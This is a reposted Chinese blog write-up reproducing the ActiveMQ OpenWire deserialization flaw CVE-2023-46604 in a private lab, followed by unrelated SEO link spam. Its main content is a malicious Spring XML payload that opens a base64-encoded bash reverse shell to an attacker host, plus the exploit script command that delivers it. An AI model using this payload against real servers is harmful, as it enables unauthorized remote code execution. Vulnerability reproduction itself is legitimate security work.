首页 - 资讯 - 科技 - 教育 - 汽车 - 财经 - 健康 - 房产 - 文旅 - 娱乐 - 游戏
幼教 |高考 |大学 |就业 |锐评 |培训 |数码 |互联网 |名企 |IT业 |能源 |资讯 |焦点 |会展
当前位置: 首页> 教育> 就业 > ActiveMQ-CVE-2023-46604

ActiveMQ-CVE-2023-46604

时间:2025/7/11 8:16:06来源:https://blog.csdn.net/m0_60894143/article/details/140346311 浏览次数:0次

Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActvieMQ5.18.2版本以及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作OpenWire协议中的序列化类型,导致代理的类路径上任何类实例化,从而执行任意命令。

143为VPS

131为靶机

复现

先将poc移动到VPS   /var/www/html目录下

开启http服务

攻击机执行命令

成功

利用反弹shell

将xml改成反弹shell

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

       xsi:schemaLocation="http://www.springframework.org/schema/beans

       http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

        <constructor-arg>

            <list>

                <value>bash</value>

                <value>-c</value>

                <value>{echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE0My8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}</value>

            </list>

        </constructor-arg>

    </bean>

</beans>

nc和http同时开启

攻击机执行命令

python exploit.py -i 192.168.62.131 -u http://192.168.62.143:8000/poc.xml

关键字:ActiveMQ-CVE-2023-46604

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑:
>> 相关文章
>> 热门图片
如何认识软件开发模型_渠道推广方案_网络销售哪个平台最好_网上营销是做什么的
如何认识软件开发模型_渠道推广方案_网络销售哪个平台最好_网上营销是做什么的
网站查询域名ip解析_乐清疫情最新通告今天_渠道策略的四种方式_站长工具爱站网
网站查询域名ip解析_乐清疫情最新通告今天_渠道策略的四种方式_站长工具爱站网
长春财经学院学费多少_淡水网站建设定制_网站收录申请_seo整站优化方案案例
长春财经学院学费多少_淡水网站建设定制_网站收录申请_seo整站优化方案案例
建立网络平台需要什么_潍坊专业环保设备_seo搜索推广费用多少_网站seo优化的目的
建立网络平台需要什么_潍坊专业环保设备_seo搜索推广费用多少_网站seo优化的目的
漂亮的网页_商务网站规划与设计实训报告_优化方案模板_安全优化大师
漂亮的网页_商务网站规划与设计实训报告_优化方案模板_安全优化大师
联通腾讯合作_seo职位具体做什么_上饶seo博客_厦门seo哪家强
联通腾讯合作_seo职位具体做什么_上饶seo博客_厦门seo哪家强
深圳龙岗网络科技有限公司_沅江网站设计公司_营销方式和渠道_查看关键词被搜索排名的软件
深圳龙岗网络科技有限公司_沅江网站设计公司_营销方式和渠道_查看关键词被搜索排名的软件
济南网站建站_华为企业文化_百度站长工具数据提交_百度爱采购平台登录
济南网站建站_华为企业文化_百度站长工具数据提交_百度爱采购平台登录
>> 热门搜索
评论排行
图片新闻
更多>>
【前端 13】Vue快速入门
成都市住房和城乡建设官网_广州网站建设网站制作公司_知名品牌营销策略_上海不限关键词优化
厦门seo厦门起梦_如何创建一个官网_主要推广手段免费_域名是什么意思
苏州网站设计哪家好_短视频关键词优化_网站维护主要做什么_seo网络推广公司排名
点击排行

邮箱:809451989@qq.com 网站地图
未经过本站允许,请勿将本站内容传播或复制